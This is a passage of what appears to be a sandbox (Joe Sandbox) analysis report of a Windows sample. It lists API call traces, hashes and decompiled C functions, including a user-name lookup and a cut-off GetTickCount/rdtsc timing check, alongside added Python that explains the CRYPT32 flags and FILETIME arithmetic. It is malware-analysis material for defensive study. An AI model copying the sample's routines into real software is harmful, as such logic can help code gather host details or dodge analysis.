                            • Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C7B
                            • Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C89
                            • Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C97
                            • Part of subcall function 005CC110: lstrlen.KERNEL32(?), ref: 005CC154
                            • Part of subcall function 005C1F50: GetExitCodeThread.KERNEL32(?,?,?,?,005C391B), ref: 005C1F6A
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$lstrcmpi$CodeExitThreadlstrlen
                          • String ID:
                          • API String ID: 1549611325-0
                          • Opcode ID: 3fcc89a6b95feb188254e9d2736054248cea6df2eec221095bee8c59c2ceb780
                          • Instruction ID: 5374555af39ffbacf16caea197ccd24359e4d97589dc861afca51c2f0d9b0fbf
                          • Opcode Fuzzy Hash: 3fcc89a6b95feb188254e9d2736054248cea6df2eec221095bee8c59c2ceb780
                          • Instruction Fuzzy Hash: FD1280B1604302AFE730DF68D889B6A7BE4BB84344F54842FF549873A1EB71D949CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptBinaryToStringW.CRYPT32(0027A490,?,00000001,00000000), ref: 005D71B2
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • CryptBinaryToStringW.CRYPT32(?,?,80000001,00000000), ref: 005D71DE
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: e316239148861573b3f8d3f1ece5deb5e56ffca1cb21951696ae93e08a53a079
                          • Instruction ID: 82a7f8a7bf0039df155e8de435861a56052ffacd172f4bb35e3e304990022aba
                          • Opcode Fuzzy Hash: e316239148861573b3f8d3f1ece5deb5e56ffca1cb21951696ae93e08a53a079
                          • Instruction Fuzzy Hash: D5118B71208214AFD6209B2ADC45A2BBBEDFF9A758F08051AF845D7360E372DD00CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 005D08C1
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000007,00000000,?,00000000,00000000), ref: 005D08EC
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 646733e37461d8809ff9ce386da39284e96f247bc0e71765731e55f5bc45e279
                          • Instruction ID: c71eb251d32b49508be4822afb1235ead996d67b90ee2fd7935b98517cf92067
                          • Opcode Fuzzy Hash: 646733e37461d8809ff9ce386da39284e96f247bc0e71765731e55f5bc45e279
                          • Instruction Fuzzy Hash: 3E018071605228BFE2308B1ADC49F5B7FECFF89B94F01442AF44897291D2619D00C6F2
                          Uniqueness

                          Uniqueness Score: -1.00%
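
The two CRYPT32 call pairs listed above (CryptBinaryToStringW with dwFlags 0x00000001 then 0x80000001, and CryptStringToBinaryW with dwFlags 0x00000001 then 0x00000007) are easier to read once the flag words are split into their format and modifier parts. The following Python is an added example written for this page; it is not code from the sample or from Joe Sandbox. It decodes the flag values seen in the log, emulates the Base64 output formatting of CryptBinaryToStringW (64-character lines, CRLF or LF terminators depending on the modifier bits) and the whitespace-tolerant Base64 decoding of CryptStringToBinaryW, and shows what a size-query call reports. The input blob is constructed; the raw-binary fallback of CRYPT_STRING_ANY and the hex formats are deliberately not emulated.

```python
import base64
import re

# wincrypt.h: the format selector lives in the low word of dwFlags ...
CRYPT_STRING_FORMATS = {
    0x0: "CRYPT_STRING_BASE64HEADER",
    0x1: "CRYPT_STRING_BASE64",
    0x2: "CRYPT_STRING_BINARY",
    0x3: "CRYPT_STRING_BASE64REQUESTHEADER",
    0x4: "CRYPT_STRING_HEX",
    0x5: "CRYPT_STRING_HEXASCII",
    0x6: "CRYPT_STRING_BASE64_ANY",
    0x7: "CRYPT_STRING_ANY",
    0x8: "CRYPT_STRING_HEX_ANY",
}
# ... and single-bit modifiers live in the high word.
CRYPT_STRING_MODIFIERS = {
    0x20000000: "CRYPT_STRING_STRICT",   # CryptStringToBinary: reject trailing data
    0x40000000: "CRYPT_STRING_NOCRLF",   # CryptBinaryToString: no line breaks at all
    0x80000000: "CRYPT_STRING_NOCR",     # CryptBinaryToString: LF instead of CRLF
}

BASE64_FORMATS = {"CRYPT_STRING_BASE64", "CRYPT_STRING_BASE64_ANY", "CRYPT_STRING_ANY"}


def decode_crypt_string_flags(dw_flags):
    """Split dwFlags into (format name, list of modifier names)."""
    fmt = dw_flags & 0xFFFF
    name = CRYPT_STRING_FORMATS.get(fmt, "unknown format 0x%x" % fmt)
    mods = [n for bit, n in sorted(CRYPT_STRING_MODIFIERS.items()) if dw_flags & bit]
    return name, mods


def crypt_binary_to_string(data, dw_flags):
    """Emulate CryptBinaryToStringW for the Base64 format: Crypt32 wraps the
    output at 64 characters and terminates every line, the last one included,
    with CRLF (LF under NOCR, no line breaks at all under NOCRLF)."""
    fmt, mods = decode_crypt_string_flags(dw_flags)
    if fmt != "CRYPT_STRING_BASE64":
        raise ValueError("only CRYPT_STRING_BASE64 output is emulated, got " + fmt)
    text = base64.b64encode(data).decode("ascii")
    if "CRYPT_STRING_NOCRLF" in mods:
        return text
    eol = "\n" if "CRYPT_STRING_NOCR" in mods else "\r\n"
    return "".join(text[i:i + 64] + eol for i in range(0, len(text), 64))


def required_wchar_count(data, dw_flags):
    """What a size-query call (pszString == NULL) reports through pcchString:
    the character count of the result plus its terminating NUL."""
    return len(crypt_binary_to_string(data, dw_flags)) + 1


def crypt_string_to_binary(text, dw_flags):
    """Emulate the Base64 paths of CryptStringToBinaryW: whitespace (the CR/LF
    the encoder inserted) is skipped, and the *_ANY formats also tolerate
    PEM-style -----BEGIN/END----- header lines."""
    fmt, mods = decode_crypt_string_flags(dw_flags)
    if fmt not in BASE64_FORMATS:
        raise ValueError("only Base64 input formats are emulated, got " + fmt)
    lines = text.splitlines()
    if fmt != "CRYPT_STRING_BASE64":
        lines = [line for line in lines if not line.startswith("-----")]
    compact = re.sub(r"\s+", "", "".join(lines))
    return base64.b64decode(compact, validate=True)


# Constructed sample input, not data recovered from the sample's memory.
SAMPLE_BLOB = b"A" * 48   # 48 bytes encode to exactly one 64-character Base64 line


def demo():
    """Run both call pairs with the flag values from the API log and collect the results."""
    encoded_crlf = crypt_binary_to_string(SAMPLE_BLOB, 0x00000001)
    encoded_lf = crypt_binary_to_string(SAMPLE_BLOB, 0x80000001)
    return {
        "flags_first_call": decode_crypt_string_flags(0x00000001),
        "flags_second_call": decode_crypt_string_flags(0x80000001),
        "flags_decode_any": decode_crypt_string_flags(0x00000007),
        "encoded_crlf": encoded_crlf,
        "encoded_lf": encoded_lf,
        "size_query": required_wchar_count(SAMPLE_BLOB, 0x00000001),
        "roundtrip_ok": crypt_string_to_binary(encoded_crlf, 0x00000001) == SAMPLE_BLOB
                        and crypt_string_to_binary(encoded_lf, 0x00000007) == SAMPLE_BLOB,
    }
```

When triaging strings pulled from the associated memory dumps, the decoder above accepts the exact line-wrapped form CryptBinaryToStringW produces, so a blob that fails to decode here is either not this helper's output or has been altered after encoding.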

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,005CC60F), ref: 005D4E77
                          • _aulldiv.NTDLL(2AC18000,?,00989680,00000000), ref: 005D4E95
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Time$FileSystem_aulldiv
                          • String ID:
                          • API String ID: 2806457037-0
                          • Opcode ID: b7abda945088012742a9f4bf07ba17b9e6c5324599421d4532bd4bf56ebbed2a
                          • Instruction ID: 7c7cc65733e82cfcf0bb184f99565cb289fd666eae80e5edc2ff925590f65292
                          • Opcode Fuzzy Hash: b7abda945088012742a9f4bf07ba17b9e6c5324599421d4532bd4bf56ebbed2a
                          • Instruction Fuzzy Hash: 15D0A73010111067C120FB28FD49F963718DF41209F04050AF886AA340D615AD14C7E9
                          Uniqueness

                          Uniqueness Score: -1.00%
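
The GetSystemTimeAsFileTime call followed by _aulldiv with a divisor of 0x00989680 (10,000,000) is the arithmetic that turns a FILETIME's 100-nanosecond ticks into seconds. The captured argument list `2AC18000,?,00989680,00000000` is the x86 CRT operand layout: dividend low dword, dividend high dword (not captured here), divisor low dword, divisor high dword. Whether the binary also rebases the result onto the Unix epoch is not visible in the captured arguments, so the added Python below, which is example code written for this page and not the sample's own logic, shows both the plain tick-to-second division and the epoch-rebased variant, plus the reconstruction of a 64-bit operand from its two stack dwords. The timestamp used in `demo()` is constructed.

```python
from datetime import datetime, timezone

# A FILETIME counts 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
TICKS_PER_SECOND = 0x00989680                  # 10,000,000: the divisor in the _aulldiv call
EPOCH_DELTA_TICKS = 116_444_736_000_000_000    # ticks from 1601-01-01 to 1970-01-01


def qword_from_dwords(lo, hi):
    """Rebuild an unsigned 64-bit operand from the two 32-bit stack slots
    (low dword at the lower address) that the x86 CRT passes to _aulldiv."""
    return ((hi & 0xFFFFFFFF) << 32) | (lo & 0xFFFFFFFF)


def aulldiv(dividend_lo, dividend_hi, divisor_lo, divisor_hi):
    """Unsigned 64-bit division with the operand order of ntdll!_aulldiv:
    dividend (lo, hi) followed by divisor (lo, hi)."""
    divisor = qword_from_dwords(divisor_lo, divisor_hi)
    if divisor == 0:
        raise ZeroDivisionError("_aulldiv traps on a zero divisor")
    return qword_from_dwords(dividend_lo, dividend_hi) // divisor


def filetime_to_seconds_since_1601(filetime):
    """Plain tick-to-second conversion: FILETIME / 10,000,000."""
    return filetime // TICKS_PER_SECOND


def filetime_to_unix_seconds(filetime):
    """The common variant that also rebases the result onto the Unix epoch."""
    if filetime < EPOCH_DELTA_TICKS:
        raise ValueError("FILETIME predates 1970-01-01")
    return (filetime - EPOCH_DELTA_TICKS) // TICKS_PER_SECOND


def unix_seconds_to_filetime(seconds):
    """Inverse of filetime_to_unix_seconds, useful for building test values."""
    return seconds * TICKS_PER_SECOND + EPOCH_DELTA_TICKS


def filetime_to_datetime(filetime):
    """Human-readable UTC timestamp for a FILETIME found in a memory dump."""
    return datetime.fromtimestamp(filetime_to_unix_seconds(filetime), tz=timezone.utc)


def demo():
    # Constructed FILETIME for 2019-10-21 00:00:00 UTC; not a value taken from the sample.
    ft = unix_seconds_to_filetime(1_571_616_000)
    lo, hi = ft & 0xFFFFFFFF, ft >> 32
    return {
        "dwords_on_stack": (lo, hi, TICKS_PER_SECOND, 0),
        "seconds_since_1601": aulldiv(lo, hi, TICKS_PER_SECOND, 0),
        "unix_seconds": filetime_to_unix_seconds(ft),
        "utc": filetime_to_datetime(ft).isoformat(),
    }
```

A quotient near 13.2 billion means the binary is working in seconds since 1601; one near 1.57 billion (for a run in October 2019) means it subtracted the 1601-to-1970 offset first, which is what to look for when the high dword of the dividend is recovered from a full trace.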

                          C-Code - Quality: 94%
                          			E005D3430() {
                          				void* _t36;
                          				intOrPtr* _t37;
                          				void* _t38;
                          				WCHAR** _t48;
                          				WCHAR* _t50;
                          				WCHAR** _t51;
                          				WCHAR** _t55;
                          				signed int _t57;
                          				WCHAR** _t58;
                          				void* _t59;
                          				WCHAR** _t62;
                          				WCHAR* _t63;
                          				intOrPtr _t67;
                          				WCHAR** _t68;
                          				signed int _t70;
                          				void* _t71;
                          				void* _t73;
                          				WCHAR** _t75;
                          				WCHAR** _t76;
                          				WCHAR** _t78;
                          				intOrPtr* _t79;
                          				void* _t80;
                          				WCHAR*** _t81;
                          				WCHAR*** _t82;
                          
                          				_t67 =  *((intOrPtr*)(_t79 + 0x30));
                          				_t57 = 0;
                          				 *_t79 = 0;
                          				 *((intOrPtr*)(_t79 + 8)) = 0;
                          				if(_t67 != 0) {
                          					_t36 = E005CC380(_t67, 0, _t79 + 8,  *((intOrPtr*)(_t79 + 0x34)));
                          					_t80 = _t79 + 0x10;
                          					if(_t36 != 0) {
                          						_t37 = _t80 + 0xc;
                          						 *_t37 = 0x2f;
                          						_push(6);
                          						_push(_t80);
                          						_push(_t37);
                          						_push( *((intOrPtr*)(_t80 + 0x14)));
                          						_t38 = E005C9FF0();
                          						_t81 = _t80 + 0x10;
                          						_t57 = 0;
                          						_t73 = _t38;
                          						_t75 = 0;
                          						_t81[1] = 0;
                          						if(_t38 == 6) {
                          							_t58 = _t81[0x10];
                          							_t48 = E005C8C50(( *_t81)[4]);
                          							_t82 =  &(_t81[1]);
                          							_t76 = _t48;
                          							_t50 = E005C8C50(( *_t82)[3]);
                          							_t81 =  &(_t82[1]);
                          							 *_t58 = _t50;
                          							if(_t76 == 0) {
                          								_t57 = 0;
                          								_t81[1] = 0;
                          								goto L13;
                          							} else {
                          								_t51 =  *_t81;
                          								_t57 = 0;
                          								_t81[1] = _t76;
                          								_t63 = _t51[5];
                          								if(( *_t63 & 0x0000ffff) != 0xd) {
                          									L13:
                          									_t75 = 0;
                          								} else {
                          									_t57 = 0;
                          									if((_t63[1] & 0x0000ffff) != 0xa) {
                          										goto L13;
                          									} else {
                          										_t71 = _t67 + lstrlenW( *_t51) + 2;
                          										_t59 = 0xfffffff0;
                          										do {
                          											_t71 = _t71 + lstrlenW( *( *_t81 + _t59 + 0x14)) + 1;
                          											_t59 = _t59 + 4;
                          										} while (_t59 != 0);
                          										_t78 = _t81[1];
                          										_t57 = 0;
                          										if( *((char*)(_t71 +  &(_t78[0]))) != 0xd) {
                          											goto L13;
                          										} else {
                          											_t72 = _t71 + 2;
                          											_t57 = 0;
                          											if( *((char*)(_t71 + 2 +  &(_t78[0]))) != 0xa) {
                          												goto L13;
                          											} else {
                          												_t55 = E005C3180(_t78, 0);
                          												_t81 =  &(_t81[2]);
                          												if(_t55 == 0) {
                          													_t57 = 0;
                          													goto L13;
                          												} else {
                          													_t75 = _t55;
                          													E005CC400(_t55, _t72, _t78);
                          													_t81 =  &(_t81[3]);
                          													_t57 = 1;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						_t39 = _t81[2];
                          						if(_t81[2] != 0) {
                          							E005C91E0(_t39);
                          							_t81 =  &(_t81[1]);
                          						}
                          						_t40 =  *_t81;
                          						_t68 = _t81[0xf];
                          						_t62 = _t81[0xe];
                          						if( *_t81 != 0) {
                          							if(_t73 != 0) {
                          								E005C91E0( *_t40);
                          								_t81 =  &(_t81[1]);
                          								if(_t73 != 1) {
                          									_t70 = 1;
                          									do {
                          										E005C91E0(( *_t81)[_t70]);
                          										_t81 =  &(_t81[1]);
                          										_t70 = _t70 + 1;
                          									} while (_t73 != _t70);
                          								}
                          								_t40 =  *_t81;
                          								_t68 = _t81[0xf];
                          							}
                          							E005C91E0(_t40);
                          							_t81 =  &(_t81[1]);
                          							_t62 = _t81[0xe];
                          						}
                          						 *_t62 = _t75;
                          						 *_t68 = _t81[1];
                          					}
                          				}
                          				return _t57;
                          			}

                          APIs
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4
                          • lstrlenW.KERNEL32(00000000), ref: 005D34EE
                          • lstrlenW.KERNEL32(?), ref: 005D350A
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidelstrlen
                          • String ID:
                          • API String ID: 3109718747-0
                          • Opcode ID: 849a1874260f98c1c68379d18086051b13e73c54513ad41a7fb177eeb33674fb
                          • Instruction ID: 37064862e3f63581b1b8e9ed62bfe66ed1e635c6bb8710ac46018c8bb6d7e332
                          • Opcode Fuzzy Hash: 849a1874260f98c1c68379d18086051b13e73c54513ad41a7fb177eeb33674fb
                          • Instruction Fuzzy Hash: 48419F75604301AFD721AFACE889B2ABBE5BF84304F49442EF94987352E671EE14C653
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E005CF0E0() {
                          				short* _t72;
                          				short* _t73;
                          				signed char _t74;
                          				signed char* _t76;
                          				void* _t80;
                          				void* _t82;
                          				void* _t85;
                          				short** _t90;
                          				short* _t97;
                          				void* _t102;
                          				char* _t106;
                          				signed char _t108;
                          				signed char _t109;
                          				short** _t113;
                          				short** _t114;
                          				signed char _t116;
                          				unsigned int _t118;
                          				short** _t123;
                          				short** _t126;
                          				void* _t127;
                          				short** _t132;
                          				signed int _t133;
                          				void* _t136;
                          				short** _t138;
                          				short* _t141;
                          				signed int _t143;
                          				short** _t145;
                          				signed int _t146;
                          				signed int _t148;
                          				short** _t153;
                          				short** _t154;
                          				short*** _t155;
                          				char _t173;
                          				short** _t181;
                          
                          				_t113 = _t155[0x10f];
                          				_t148 = _t155[0x10e];
                          				 *_t155 =  &(_t155[0x111]);
                          				_t132 = _t113 + _t148;
                          				if(_t113 > 0) {
                          					_t153 = _t155[0x110];
                          					_t148 = _t155[0x10e];
                          					_t72 =  *_t153;
                          					if(_t72 != 0) {
                          						_t155[1] = _t132;
                          						_t133 = _t155[0x10e];
                          						_t155[7] =  ~_t133 - _t113;
                          						_t148 = _t133;
                          						_t132 = _t155[1];
                          						do {
                          							if(_t72 != 0x25) {
                          								 *_t148 = _t72;
                          								goto L10;
                          							} else {
                          								_t73 = _t153[0];
                          								_t114 =  &(_t153[0]);
                          								_t155[8] = 0;
                          								if(_t73 + 0xd0 > 9) {
                          									_t74 = 0x20;
                          								} else {
                          									_t154 =  &(_t153[0]);
                          									_t146 = 0;
                          									_t141 = _t73;
                          									do {
                          										_t146 = _t141 + (_t146 + _t146 * 4) * 2 - 0x30;
                          										_t141 =  *_t154;
                          										_t154 =  &(_t154[0]);
                          									} while (_t141 + 0xd0 < 0xa);
                          									do {
                          										_t143 = _t114[0];
                          										_t114 =  &(_t114[0]);
                          										_t102 = _t143 + 0xd0;
                          									} while (_t102 < 0xa);
                          									_t74 = (_t143 & 0xffffff00 | _t102 == 0x00000030) << 0x00000004 | 0x00000020;
                          								}
                          								_t132 = _t155[1];
                          								if(_t74 == 0x6c) {
                          									_t74 = _t114[0];
                          									_t114 =  &(_t114[0]);
                          								}
                          								_t153 = _t114;
                          								if(_t74 > 0x57) {
                          									_t155[2] = _t74;
                          									_t116 = _t74 + 0x90;
                          									if(_t116 > 8) {
                          										if(_t74 == 0x58) {
                          											_t75 =  *_t155;
                          											_t136 = 0;
                          											_t44 =  &(_t75[1]); // 0x24
                          											 *_t155 = _t44;
                          											_t118 =  *( *_t155);
                          											_t76 =  &(_t155[6]);
                          											_t155[6] = 0;
                          											while(_t118 != 0) {
                          												_t108 = _t118 & 0x0000000f;
                          												if(_t108 < 0xa) {
                          													_t109 = _t108 | 0x00000030;
                          												} else {
                          													_t109 = _t108 + 0x37;
                          												}
                          												_t136 = _t136 + 1;
                          												 *_t76 = _t109;
                          												_t76 = _t76 - 1;
                          												_t118 = _t118 >> 4;
                          												if(_t136 < 8) {
                          													continue;
                          												}
                          												goto L50;
                          											}
                          											goto L50;
                          										} else {
                          											if(_t74 == 0x64) {
                          												_t91 =  *_t155;
                          												_t106 =  &(_t155[8]);
                          												_t36 =  &(_t91[1]); // 0x24
                          												 *_t155 = _t36;
                          												_push(_t106);
                          												_push( *( *_t155));
                          												E005C5BE0();
                          												goto L36;
                          											}
                          										}
                          									} else {
                          										switch( *((intOrPtr*)((_t116 & 0x000000ff) * 4 +  &M005CF408))) {
                          											case 0:
                          												_t94 =  *_t155;
                          												_t139 = 0;
                          												_t31 =  &(_t94[1]); // 0x24
                          												 *_t155 = _t31;
                          												_t130 =  *( *_t155);
                          												_t95 =  &(_t155[6]);
                          												_t155[6] = 0;
                          												do {
                          													_t111 = _t130 & 0x0000000f;
                          													if(_t111 < 0xa) {
                          														_t112 = _t111 | 0x00000030;
                          													} else {
                          														_t112 = _t111 + 0x37;
                          													}
                          													_t139 = _t139 + 1;
                          													 *(_t95 - 1) = _t112;
                          													_t95 = _t95 - 1;
                          													_t130 = _t130 >> 4;
                          												} while (_t139 < 8);
                          												goto L51;
                          											case 1:
                          												goto L65;
                          											case 2:
                          												__eax =  *__esp;
                          												__ecx =  &(__eax[4]);
                          												 *__esp =  &(__eax[4]);
                          												if( *__eax != 0) {
                          													goto L53;
                          												} else {
                          												}
                          												goto L65;
                          											case 3:
                          												__eax =  *__esp;
                          												__ecx =  &(__eax[4]);
                          												 *__esp =  &(__eax[4]);
                          												__eax = E005C81C0( *__eax,  &(__esp[8]));
                          												L36:
                          												_t132 = _t155[3];
                          												_t155 =  &(_t155[2]);
                          												goto L53;
                          											case 4:
                          												__eax =  *__esp;
                          												__edx = 0;
                          												_t41 =  &(__eax[4]); // 0x4
                          												__ecx = _t41;
                          												 *__esp = _t41;
                          												__ecx =  *( *__esp);
                          												__eax =  &(__esp[6]);
                          												__esp[6] = 0;
                          												while(__ecx != 0) {
                          													if((__ecx & 0x0000000f) < 0xa) {
                          														__bl = __bl | 0x00000030;
                          													} else {
                          														__bl = __bl + 0x57;
                          													}
                          													__edx = __edx + 1;
                          													 *__eax = __bl;
                          													__eax = __eax - 1;
                          													__ecx = __ecx >> 4;
                          													if(__edx < 8) {
                          														continue;
                          													} else {
                          													}
                          													break;
                          												}
                          												L50:
                          												_t77 =  &(_t76[1]);
                          												L51:
                          												_t106 =  &(_t155[0xa]);
                          												E005CC400(_t106, _t77,  &(_t155[7]) - _t77);
                          												_t155 =  &(_t155[3]);
                          												goto L52;
                          										}
                          									}
                          									goto L65;
                          								} else {
                          									if(_t74 == 0x25) {
                          										 *_t148 = 0x25;
                          										L10:
                          										_t148 = _t148 + 1;
                          										goto L65;
                          									} else {
                          										if(_t74 != 0x53) {
                          											if(_t74 != 0) {
                          												goto L65;
                          											} else {
                          											}
                          										} else {
                          											_t155[2] = _t74;
                          											_t96 =  *_t155;
                          											_t106 =  &(_t155[8]);
                          											_t26 =  &(_t96[1]); // 0x24
                          											 *_t155 = _t26;
                          											_t97 =  *( *_t155);
                          											if(_t97 != 0) {
                          												_t106 =  &(_t155[0xb]);
                          												WideCharToMultiByte(0xfde9, 0, _t97, 0xffffffff, _t106, 0x400, 0, 0);
                          												L52:
                          												_t132 = _t155[1];
                          											}
                          											L53:
                          											_t80 = _t132 - _t148;
                          											if( *_t106 != 0) {
                          												_t127 = 0;
                          												do {
                          													_t173 = _t106[_t127 + 1];
                          													_t127 = _t127 + 1;
                          												} while (_t173 != 0);
                          											}
                          											_t138 =  <  ? 0 : _t80 - 1;
                          											_t82 = 0 - _t138;
                          											_t155[3] = _t138;
                          											if(_t82 > 0 && _t148 < _t155[1] && _t82 != 0) {
                          												_t85 = _t155[7] + _t148;
                          												_t123 = _t155[3];
                          												_t124 =  <  ? _t85 : _t123;
                          												_t125 =  ~( <  ? _t85 : _t123);
                          												E005D6610(_t148, _t155[2] & 0x000000ff,  ~( <  ? _t85 : _t123));
                          												_t126 = _t155[4];
                          												_t155 =  &(_t155[3]);
                          												_t90 =  &(_t155[3][0]);
                          												while(1) {
                          													_t148 = _t148 + 1;
                          													if(_t148 >= _t126) {
                          														goto L64;
                          													}
                          													_t181 = _t90;
                          													_t90 =  &(_t90[0]);
                          													if(_t181 != 0) {
                          														continue;
                          													}
                          													goto L64;
                          												}
                          											}
                          											L64:
                          											_t145 = _t155[3];
                          											E005CC400(_t148, _t106, _t145);
                          											_t132 = _t155[4];
                          											_t155 =  &(_t155[3]);
                          											_t148 = _t145 + _t148;
                          											L65:
                          											if(_t148 < _t132) {
                          												goto L66;
                          											}
                          										}
                          									}
                          								}
                          							}
                          							goto L67;
                          							L66:
                          							_t72 = _t153[0];
                          							_t153 =  &(_t153[0]);
                          						} while (_t72 != 0);
                          					}
                          				}
                          				L67:
                          				_t70 =  <  ? _t148 : _t132 - 1;
                          				 *((char*)( <  ? _t148 : _t132 - 1)) = 0;
                          				return _t148 - _t155[0x10e];
                          			}

                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 005CF1F6
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: 41774ea48b953fadd3b135c4db78b7d699a745bfb678e754e8353c0da9d1abde
                          • Instruction ID: cc69dfbce3b9af90d55edd82570b4aa63e2bf6b0f02b26e5bb2528fcc9824da2
                          • Opcode Fuzzy Hash: 41774ea48b953fadd3b135c4db78b7d699a745bfb678e754e8353c0da9d1abde
                          • Instruction Fuzzy Hash: F5A1D6342087859FDB19CE58C894FAEBFE2FFC5704F08892DE4D687245D630994ACB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E005D1960(void* __eflags, intOrPtr _a4) {
                          				char _v526;
                          				char _v726;
                          				DWORD* _t6;
                          				WCHAR* _t14;
                          				DWORD* _t16;
                          
                          				_t6 = _t16;
                          				_t14 =  &_v526;
                          				 *_t6 = 0x100;
                          				GetUserNameW(_t14, _t6);
                          				E005D4520( &_v726, 0x65);
                          				_push(_t14);
                          				return 0 | E005D4610(_a4, 0xe,  &_v726) != 0x00000000;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: fc60ee403f2121f0c9c2ec8e0859168ca2c7aa2227434d0e17b8070a76b2f212
                          • Instruction ID: 31e72e20082b472683b6e24bbbcad0e635ba9e84d3206b976b934158dc176a85
                          • Opcode Fuzzy Hash: fc60ee403f2121f0c9c2ec8e0859168ca2c7aa2227434d0e17b8070a76b2f212
                          • Instruction Fuzzy Hash: 88E09B766412452BF7307618FC8EFAB772CDBD1711F000417F945A7281E2B45D5596B2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E005C8160(intOrPtr __edx) {
                          				intOrPtr _v8;
                          				signed char _v12;
                          				signed int _v16;
                          				long _t10;
                          				signed char _t11;
                          				long _t13;
                          				intOrPtr _t15;
                          				signed int _t19;
                          
                          				_t15 = __edx;
                          				_t10 = GetTickCount();
                          				_t13 = _t10;
                          				asm("rdtsc");
                          				_v12 = _t10;
                          				_v8 = _t15;
                          				_t11 = _v12;
                          				_v16 = 1;
